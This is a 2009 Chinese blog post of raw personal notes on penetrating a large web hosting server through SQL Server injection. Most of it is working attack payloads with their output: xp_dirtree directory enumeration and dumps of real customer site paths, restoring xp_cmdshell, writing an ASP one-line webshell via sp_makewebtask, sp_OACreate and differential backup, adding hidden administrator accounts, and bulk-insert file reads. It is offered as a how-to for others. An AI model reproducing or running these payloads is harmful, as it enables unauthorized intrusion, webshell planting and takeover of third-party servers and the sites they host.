分类: 系统运维
2009-01-02 10:36:29
渗透某大型服务器的笔记,希望对一些人有用 (原创)
(不过,这是我自己的笔记,所以很乱,没有整理,看得明白就看吧!sorry)
------------
三是直接爆网站路径,再来个差异备份,但是很有效果。直捣黄龙,很强大。
爆路径语句
第一步:建立表
' ;drop table resina;create table resina([id] [int] identity (1,1) not null,[name] [nvarchar] (300) not null,[depth] [int] not null,[isfile] [nvarchar] (50) null);-- and '1'='1
-------------------
第二步:
' ;declare @z nvarchar(4000) set @z=0x63003a005c00 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意:0x63003a005c00 = C:\ 为sql ENCODE 其他的自己找工具去转吧
' ;declare @z nvarchar(4000) set @z=0x64003a005c00 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意:0x63003a005c00 = d:\ 为sql ENCODE 其他的自己找工具去转吧
' ;declare @z nvarchar(4000) set @z=0x65003a005c00 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意:0x63003a005c00 = e:\ 为sql ENCODE 其他的自己找工具去转吧
' ;declare @z nvarchar(4000) set @z=0x66003a005c00 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意:0x63003a005c00 = f:\ 为sql ENCODE 其他的自己找工具去转吧
' ;declare @z nvarchar(4000) set @z=0x67003a005c00 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意:0x63003a005c00 = g:\ 为sql ENCODE 其他的自己找工具去转吧
--------------------------
第三步:暴出总数
' and (select cast(count(*) as varchar(8000))+char(94) from resina)>0-- and '1'='1
第四步:暴出文件名
' and 0<(select top 1 cast([isfile] as nvarchar(4000))+char(94)+cast([name] as nvarchar(4000)) from (select distinct top 1 * from resina order by isfile,name) t order by isfile desc,name desc)-- and '1'='1
修改中间红色的1,依次爆出。
' and 0<(select top 1 cast([isfile] as nvarchar(4000))+char(94)+cast([name] as nvarchar(4000)) from (select distinct top 2 * from resina order by isfile,name) t order by isfile desc,name desc)-- and '1'='1
-------------------------------
-------------------------------
d:\
Server]将 varchar 值 '42^' 转换为数据类型为
argh
hzhost
IIS_Monitor
MYOA
powereasy6.6
Program Files
RECYCLER
Serv-U_70sdjfsjdpwierpolsjdfiwyerisdfs
sqldata
System Volume Information
temp
wwwroot
wwwroot-2
常用SQL命令
1.txt
FlashMediaServer2.exe
hzcommon.dll
hzonlpay.dll
license.lic
setup.exe
sysdbftp.scr
--------------------------------
*************************************************
e:\
varchar 值 '16^' 转换为数据类型为 int
7i24.com
RECYCLER
soft
software
System Volume Information
TDDOWNLOAD
WinWebMail
WinWebMail.rar
***************************************
f:\
r]将 varchar 值 '16^' 转换为数据类型为 int 的列时发生语法错误。
AutoAT
RECYCLER
System Volume Information
SystemBacks
copy.txt
HttpMon.exe
HttpMon.ini
sysback.GHO
*************************************
然后转入渗透D盘
d:\
第一步:建立表123'
' ;drop table resina;create table resina([id] [int] identity (1,1) not null,[name] [nvarchar] (300) not null,[depth] [int] not null,[isfile] [nvarchar] (50) null);-- and '1'='1
-----------------------
' ;declare @z nvarchar(4000) set @z=0x64003a005c0077007700770072006f006f007400 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意:0x63003a005c00 = d:\wwwroot 为sql ENCODE 其他的自己找工具去转吧
' ;declare @z nvarchar(4000) set @z=0x64003a005c0077007700770072006f006f0074002d003200 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意:0x63003a005c00 = d:\wwwroot-2 为sql ENCODE 其他的自己找工具去转吧
' ;declare @z nvarchar(4000) set @z=0x64003a005c0068007a0068006f0073007400 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意:0x63003a005c00 = d:\hzhost 为sql ENCODE 其他的自己找工具去转吧
' ;declare @z nvarchar(4000) set @z=0x64003a005c0068007a0068006f00730074005c00770077007700 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意:0x63003a005c00 = d:\hzhost\www 为sql ENCODE 其他的自己找工具去转吧
------------------------------
第三步:暴出总数
' and (select cast(count(*) as varchar(8000))+char(94) from resina)>0-- and '1'='1
第四步:暴出文件名
' and 0<(select top 1 cast([isfile] as nvarchar(4000))+char(94)+cast([name] as nvarchar(4000)) from (select distinct top 1 * from resina order by isfile,name) t order by isfile desc,name desc)-- and '1'='1
-------------------------------
d:\hzhost
Server]将 varchar 值 '58^' 转换为数据类型为 int 的列时发生语法错误。
2008年8月新网接口升级共享平台模板文件'
2008年8月新网接口升级控制面板文件'
2008年8月新网接口升级主站文件'
backup
databases
hzhost_conpanel'
hzhost_mail'
hzhost_master'
hzhost_master2'
hzhost_master3'
hzhost_url'
hzhost6.52'
hzlog
MasterOnWeb
module
new_Temptest'
system
UPdata_down'
WebSystem
www
autotask.exe'
hzauto.exe'
HZcertC.exe'
hzclient.exe'
hzhost.exe'
hzhost_conpanel.rar'
hzpro.exe'
完整的6.5.2.0530版网页文件.rar'
注意事项.txt'
-------------------------------------------
d:\hzhost\www
Server]将 varchar 值 '46^' 转换为数据类型为 int 的列时发生语法错误。
images
inc
addini.asp
addini-sub.asp
admserver.asp
e.asp
infosafe.asa
infosafe.ini
ini.asp
ini.txt
login.as p
loginfo.asp
readini.asp
reg.htm
register-post.asp
sendallini.asp
sendini.asp
serveradd.asp
update.asp
升级说明.txt
使用说明.rtf
------------------------------------
d:\wwwroot-2
varchar 值 '6^' 转换为数据类型为 int 的列时发生语法错误。
bbs
dh
fzl2008.mp3'
---------------------
d:\wwwroot
将 varchar 值 '1114^' 转换为数据类型为 int 的列时发生语法错误。
007ipcn
008idc
008idcweb
01022
0312web
05338
0735
111km1
123254846
13083563920
139e
17cool
1860288
1980ok
19dcomcn
1soon
21165
211crc
215594208
26idc
2868
313515
33207075
40050823
45094574----------------------1-50的
c20080806--------------201
caokaizhi
cc178
ccjsj2
cddjyftp---------209
eceo-----------301
elwwwsx
enic
eshikong
eyule-------------309
lajipp-------------501
lanbin123
lanf
langfang
langziknm---------509
------------------------------------------------
------------------------------------------------
d:\wwwroot\008idcweb
' ;declare @z nvarchar(4000) set @z=0x64003a005c0077007700770072006f006f0074005c00300030003800690064006300770065006200 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意:0x63003a005c00 = d:\wwwroot\008idcweb 为sql ENCODE 其他的自己找工具去转吧
varchar 值 '8^' 转换为数据类型为 int 的列时发生语法错误
databases
logfiles
others
wwwroot
-------------------
d:\wwwroot\008idcweb\wwwroot
' ;declare @z nvarchar(4000) set @z=0x64003a005c0077007700770072006f006f0074005c003000300038006900640063007700650062005c0077007700770072006f006f007400 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意:0x63003a005c00 = d:\wwwroot\008idcweb\wwwroot 为sql ENCODE 其他的自己找工具去转吧
Server]将 varchar 值 '228^' 转换为数据类型为 int 的列时发生语法错误
008idc
adm
advs
aspnet_client
bbspic
catch
centgifts
company
control
count
cp
db
domain
down
eweb
face
form
hosting
images
includes
incs
js
language
link
mailbox
master
module
mpic
news
nusoap
onlinehelp
page
paycenter
pic
shop
taobao
taocan
templates
website
0.htm'
admin.php'
cart.php'
cart_domain.php'
cart_webdiy.php'
codeimg.php'
comment.php'
comment_detail.php'
comment_send.php'
config.inc.php'
domainsend.php'
download.php'
goodssearch.php'
index.html'
index.php'
license.php'
login.php'
loginform.php'
logout.php'
lostpass.php'
member.php'
member_account.php'
member_buylist.php'
member_centlist.php'
member_domain.php'
member_fabu.php'
member_gifts.php'
member_goods.php'
member_guanli.php'
member_guanli1.php'
member_lmadd.php'
member_lmlist.php'
member_modify.php'
member_modifyok.php'
member_mygoods.php'
member_myprod.php'
member_notice.php'
member_order.php'
member_order_detail.php'
member_order1.php'
member_ordermodipay.php'
member_ordermodirec.php'
member_ordermodiyun.php'
member_orderprint.php'
member_pay.php'
member_payaccount.php'
member_paylist.php'
member_prodpay.php'
member_site.php'
member_syspay.php'
mrss.php'
norights.php'
orderconfirm.php'
ordersend.php'
ordersendok.php'
paycheck.php'
paynotice.php'
payorder.php'
phpi.php'
pop.php'
reg.php'
regform.php'
regok.php'
regxy.php'
reload.php'
rss.php'
startorder.php'
stat.php'
supersearch.php'
systry.php'
systry_send.php'
test.php'
vote.php'
whois.php'
zlic.php'
-----------------------------------
d:\wwwroot\008idcweb\wwwroot\008idc
' ;declare @z nvarchar(4000) set @z=0x64003a005c0077007700770072006f006f0074005c003000300038006900640063007700650062005c0077007700770072006f006f0074005c00300030003800690064006300 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意:0x63003a005c00 = d:\wwwroot\008idcweb\wwwroot\008idc 为sql ENCODE 其他的自己找工具去转吧
]将 varchar 值 '6^' 转换为数据类型为 int 的列时发生语法错误。
class
html
main
-----------------
d:\wwwroot\008idcweb\wwwroot\008idc\main
' ;declare @z nvarchar(4000) set @z=00x64003a005c0077007700770072006f006f0074005c003000300038006900640063007700650062005c0077007700770072006f006f0074005c003000300038006900640063005c006d00610069006e00 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意:0x63003a005c00 = d:\wwwroot\008idcweb\wwwroot\008idc\main 为sql ENCODE 其他的自己找工具去转吧
----------------------------------------------------
d:\wwwroot\1soon (通过查IP服务器,工程学得知,WEB地址为:
' ;declare @z nvarchar(4000) set @z=0x64003a005c0077007700770072006f006f0074005c00310073006f006f006e00 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意:0x63003a005c00 = d:\wwwroot\1soon 为sql ENCODE 其他的自己找工具去转吧
varchar 值 '10^' 转换为数据类型为 int 的列时发生语法错误。
databases
logfiles
others
wwwroot
wwwroot1
-----------------------------
d:\wwwroot\1soon\wwwroot
' ;declare @z nvarchar(4000) set @z=0x64003a005c0077007700770072006f006f0074005c00310073006f006f006e005c0077007700770072006f006f007400 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意:0x63003a005c00 = d:\wwwroot\1soon\wwwroot 为sql ENCODE 其他的自己找工具去转吧
将 varchar 值 '80^' 转换为数据类型为 int 的列时发生语法错误。
agent
article
aspnet_client
buttonimage
control
css
dialog'
help
icpfiles
images
img
img1
incs
js
language
master'
members
news
pdtshw
style
sysimage
sysmod
yqljgl
管理员警告:代理平台专用主机禁止放非代理平台程序,如果您已经上传了其它非代理平台程序请立即自行清理,下次再发现将直接彻底删除.txt'
2.rar
denysite.asp'
Domain.asp'
DomainNameRegistration.asp'
favicon.ico'
hzhosthtml.htm'
index.html'
infmsg.asp'
loginblock.asp'
mst_error.asp'
mst_ok.asp'
pay.asp'
QQkefu.asp'
^sitemap.xml'
wangye.html'
youhuaseo.html'
------------------------
d:\wwwroot\1soon\wwwroot\js
' ;declare @z nvarchar(4000) set @z=0x64003a005c0077007700770072006f006f0074005c00310073006f006f006e005c0077007700770072006f006f0074005c006a007300 insert resina execute master..xp_dirtree @z,1,1-- and '1'='1
注意:0x63003a005c00 = d:\wwwroot\1soon\wwwroot\js 为sql ENCODE 其他的自己找工具去转吧
Server]将 varchar 值 '14^' 转换为数据类型为 int 的列时发生语法错误。
-------
*****************************
恢复XP_cmdshell
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell') // 判断xp_cmdshell扩展存储过程是否存在
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';-- //恢复xp_cmdshell
' ;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
;exec master.dbo.xp_cmdshell 'echo ok >d:\wwwroot\1soon\wwwroot\js\resina.txt';--
*************************
利用sp_makewebtask这个存储过程写个马进去,
;exec%20sp_makewebtask%20'd:\zjkdj\zjkdj\zjkds\bake.asp,'%20select%20''<%25execute(request("a"))%25>''%20';--
' ;exec sp_makewebtask 'd:\wwwroot\1soon\wwwroot1\js\resina.asp',' select ''<%execute(request("oma"))%>'' ';--
*********************************
两个语句也是利用sp_OACreate调用wscript.shell和Shell.Application组件执行系统命令。
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\windows\system32\cmd.exe /c net localgroup administrators oma$ /add';--
' ;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\windows\system32\cmd.exe /c echo ^<%execute(request("oma"))%^> >d:\wwwroot\1soon\wwwroot\js\resina.asp';--
----------
;DECLARE @shell INT EXEC SP_OAcreate 'Shell.Application',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user jxsaqjh 1234/add';--
' ;DECLARE @shell INT EXEC SP_OAcreate 'Shell.Application',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\windows\system32\cmd.exe /c echo ^<%execute(request("oma"))%^> >d:\wwwroot\1soon\wwwroot\js\resina1.asp';--
*********************************
复制文件 不成功
' ;declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'d:\\wwwroot\1soon\wwwroot\sitemap.xml' ,'d:\\wwwroot\1soon\wwwroot\js\sitemap.xml';--
******************************
[hzhost] 差异备份shell
' ;drop table [dbo].[cnctext]-- and '1'='1
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x72616D616461 backup database @a to -- //0x72616D616461为库名的16进制
' ;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x5b687a686f73745d backup database @a to -- and '1'='1 //[hzhost] = 0x5b687a686f73745d
;create table [dbo].[cnctext] ([oma] [image])-- cnctext为表名,oma为字段名 (可以先进行这一步 ;drop table [dbo].[cnctext] )
' ;create table [dbo].[cnctext] ([oma] [image])-- and '1'='1
;insert into cnctext(oma) values(0x3C2565786563757465287265717565737428226F6D61222929253E)-- //向表的字段里插入一句话木句,为16进制的 <%execute(request("oma"))%>
' ;insert into cnctext(oma) values(0x3C2565786563757465287265717565737428226F6D61222929253E)-- and '1'='1
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x433A5C776562726F6F745C52616D6164615C6861636B657235382E617370 backup database @a to WITH DIFFERENTIAL,FORMAT-- //对数据库进行差异备份,导出ASP木马,导出地址为: 16进制 = C:\webroot\Ramada\hacker58.asp
' ;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x64003a005c0077007700770072006f006f0074005c00310073006f006f006e005c0077007700770072006f006f0074005c006a0073005c0072006500730069006e0061002e00610073007000 backup database @a to WITH DIFFERENTIAL,FORMAT-- and '1'='1 //d:\wwwroot\1soon\wwwroot\js\resina.asp
' ;Drop table [cnctext]-- //删除此表
************************************
读文件里面的内容
declare @s varchar(4000) set @s=cast(0x64726f70207461626c6520666f6f666f6f666f6f3b435245415445205441424c45205b666f6f666f6f666f6f5d285b526573756c745478745d206e76617263686172283430303029204e554c4c293b62756c6b20696e73657274205b666f6f666f6f666f6f5d2066726f6d2027643a5c5c777777726f6f745c31736f6f6e5c777777726f6f74273b416c746572205461626c65205b666f6f666f6f666f6f5d2061646420696420696e74204e4f54204e554c4c204944454e544954592028312c31293b as varchar(4000));exec(@s)-- and 1=1
-----
拆散,都试过,不成功
drop table foofoofoo;CREATE TABLE [foofoofoo]([ResultTxt] nvarchar(4000) NULL);bulk insert [foofoofoo] from 'd:\\wwwroot\1soon\wwwroot';Alter Table [foofoofoo] add id int NOT NULL IDENTITY (1,1);
' ;drop table [resina]--
' ;CREATE TABLE [resina]([ResultTxt] nvarchar(4000) NULL)--
' ;bulk insert [resina] from 'd:\\wwwroot\1soon\wwwroot\sitemap.xml'--
' ;Alter Table [resina] add id int NOT NULL IDENTITY (1,1)--
-----
' and (select cast(count(*) as varchar(8000))+char(94) from [hzhost]..[resina])>0--
' and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end from (select top 1 id,resulttxt from [resina] order by [id]) t order by [id] desc)>0--
****************************************